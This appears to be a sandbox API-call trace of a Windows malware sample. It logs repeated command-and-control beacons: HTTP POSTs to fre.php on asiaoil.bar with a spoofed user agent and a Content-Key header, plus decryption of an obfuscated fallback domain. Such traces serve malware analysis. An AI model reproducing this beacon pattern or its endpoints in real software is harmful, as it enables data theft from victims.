[0312.943] connect (s=0x30c, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0313.971] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0314.385] GetProcessHeap () returned 0x740000 [0314.385] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0314.385] GetProcessHeap () returned 0x740000 [0314.385] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0314.386] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0314.387] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0314.387] GetProcessHeap () returned 0x740000 [0314.387] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0314.387] GetProcessHeap () returned 0x740000 [0314.388] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0314.388] GetProcessHeap () returned 0x740000 [0314.388] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d70 [0314.388] GetProcessHeap () returned 0x740000 [0314.388] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0314.389] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0314.390] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0314.391] GetProcessHeap () returned 0x740000 [0314.391] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0314.391] GetProcessHeap () returned 0x740000 [0314.391] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0314.391] send (s=0x30c, buf=0x747928*, len=243, flags=0) returned 243 [0314.393] send (s=0x30c, buf=0x761fd0*, len=159, flags=0) returned 159 [0314.393] GetProcessHeap () returned 0x740000 [0314.393] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0314.393] recv (in: s=0x30c, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0314.573] GetProcessHeap () returned 0x740000 [0314.574] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0314.574] GetProcessHeap () returned 0x740000 [0314.574] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d70 | out: hHeap=0x740000) returned 1 [0314.574] GetProcessHeap () returned 0x740000 [0314.574] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0314.574] GetProcessHeap () returned 0x740000 [0314.575] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0314.575] closesocket (s=0x30c) returned 0 [0314.576] GetProcessHeap () returned 0x740000 [0314.576] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b670 | out: hHeap=0x740000) returned 1 [0314.576] GetProcessHeap () returned 0x740000 [0314.576] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0314.576] GetProcessHeap () returned 0x740000 [0314.577] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7636f8 | out: hHeap=0x740000) returned 1 [0314.577] GetProcessHeap () returned 0x740000 [0314.577] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0314.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf68) returned 0x30c [0314.892] Sleep (dwMilliseconds=0xea60) [0314.893] GetProcessHeap () returned 0x740000 [0314.893] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763938 [0314.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0314.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0314.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0314.943] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0314.952] GetProcessHeap () returned 0x740000 [0314.953] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0314.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0314.954] CryptImportKey (in: hProv=0x75d298, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0315.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.064] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.065] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.065] GetProcessHeap () returned 0x740000 [0315.065] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0315.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.067] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0315.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.073] CryptDestroyKey (hKey=0x74d768) returned 1 [0315.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.074] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0315.074] GetProcessHeap () returned 0x740000 [0315.074] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0315.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.075] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.077] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.078] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.079] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.079] GetProcessHeap () returned 0x740000 [0315.079] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be40 [0315.079] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.081] GetProcessHeap () returned 0x740000 [0315.081] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be40 | out: hHeap=0x740000) returned 1 [0315.081] GetProcessHeap () returned 0x740000 [0315.082] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0315.082] GetProcessHeap () returned 0x740000 [0315.082] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0315.082] GetProcessHeap () returned 0x740000 [0315.082] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7638a8 [0315.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.091] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cf68) returned 1 [0315.104] GetProcessHeap () returned 0x740000 [0315.104] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0315.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.106] CryptImportKey (in: hProv=0x75cf68, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0315.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.107] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.108] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.108] GetProcessHeap () returned 0x740000 [0315.109] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0315.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.110] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7638a8, pdwDataLen=0x19fcfc | out: pbData=0x7638a8, pdwDataLen=0x19fcfc) returned 1 [0315.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.111] CryptDestroyKey (hKey=0x74d768) returned 1 [0315.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.112] CryptReleaseContext (hProv=0x75cf68, dwFlags=0x0) returned 1 [0315.112] GetProcessHeap () returned 0x740000 [0315.112] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0315.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.114] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0315.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.115] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0315.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.116] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0315.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.158] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0315.158] GetProcessHeap () returned 0x740000 [0315.158] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0315.158] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0315.160] GetProcessHeap () returned 0x740000 [0315.160] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b530 [0315.160] socket (af=2, type=1, protocol=6) returned 0x310 [0315.160] connect (s=0x310, name=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0315.183] FreeAddrInfoW (pAddrInfo=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0315.183] GetProcessHeap () returned 0x740000 [0315.183] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d210 [0315.183] GetProcessHeap () returned 0x740000 [0315.183] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0315.184] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0315.185] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0315.185] GetProcessHeap () returned 0x740000 [0315.185] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0315.186] GetProcessHeap () returned 0x740000 [0315.186] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0315.186] GetProcessHeap () returned 0x740000 [0315.186] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d28 [0315.187] GetProcessHeap () returned 0x740000 [0315.187] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0315.204] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0315.205] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0315.205] GetProcessHeap () returned 0x740000 [0315.205] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0315.205] GetProcessHeap () returned 0x740000 [0315.206] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0315.206] send (s=0x310, buf=0x747928*, len=243, flags=0) returned 243 [0315.207] send (s=0x310, buf=0x761fd0*, len=159, flags=0) returned 159 [0315.207] GetProcessHeap () returned 0x740000 [0315.208] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0315.208] recv (in: s=0x310, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 569 [0315.329] GetProcessHeap () returned 0x740000 [0315.329] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0315.329] GetProcessHeap () returned 0x740000 [0315.330] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0315.330] GetProcessHeap () returned 0x740000 [0315.330] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0315.330] GetProcessHeap () returned 0x740000 [0315.330] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d210 | out: hHeap=0x740000) returned 1 [0315.330] closesocket (s=0x310) returned 0 [0315.331] GetProcessHeap () returned 0x740000 [0315.331] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b530 | out: hHeap=0x740000) returned 1 [0315.331] GetProcessHeap () returned 0x740000 [0315.331] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0315.331] GetProcessHeap () returned 0x740000 [0315.331] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7638a8 | out: hHeap=0x740000) returned 1 [0315.331] GetProcessHeap () returned 0x740000 [0315.331] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0315.332] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9c0) returned 0x310 [0315.333] Sleep (dwMilliseconds=0xea60) [0315.335] GetProcessHeap () returned 0x740000 [0315.335] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763c98 [0315.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.343] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0315.349] GetProcessHeap () returned 0x740000 [0315.349] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0315.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.350] CryptImportKey (in: hProv=0x75cc38, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0315.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.351] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.352] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.352] GetProcessHeap () returned 0x740000 [0315.353] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0315.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.399] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763c98, pdwDataLen=0x19fcfc | out: pbData=0x763c98, pdwDataLen=0x19fcfc) returned 1 [0315.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.401] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0315.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.402] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0315.402] GetProcessHeap () returned 0x740000 [0315.402] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0315.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.403] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.404] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.405] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.406] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.406] GetProcessHeap () returned 0x740000 [0315.406] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0315.406] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.406] GetProcessHeap () returned 0x740000 [0315.407] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0315.407] GetProcessHeap () returned 0x740000 [0315.407] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0315.407] GetProcessHeap () returned 0x740000 [0315.407] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0315.407] GetProcessHeap () returned 0x740000 [0315.407] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0315.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.415] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0315.423] GetProcessHeap () returned 0x740000 [0315.423] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0315.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.424] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0315.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.425] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.426] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.426] GetProcessHeap () returned 0x740000 [0315.427] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0315.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.428] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0315.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.429] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0315.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.430] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0315.430] GetProcessHeap () returned 0x740000 [0315.430] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0315.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.431] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0315.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.433] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0315.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.434] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0315.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.435] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0315.435] GetProcessHeap () returned 0x740000 [0315.435] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0315.435] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0315.477] GetProcessHeap () returned 0x740000 [0315.477] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0315.477] socket (af=2, type=1, protocol=6) returned 0x314 [0315.478] connect (s=0x314, name=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0315.522] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0315.522] 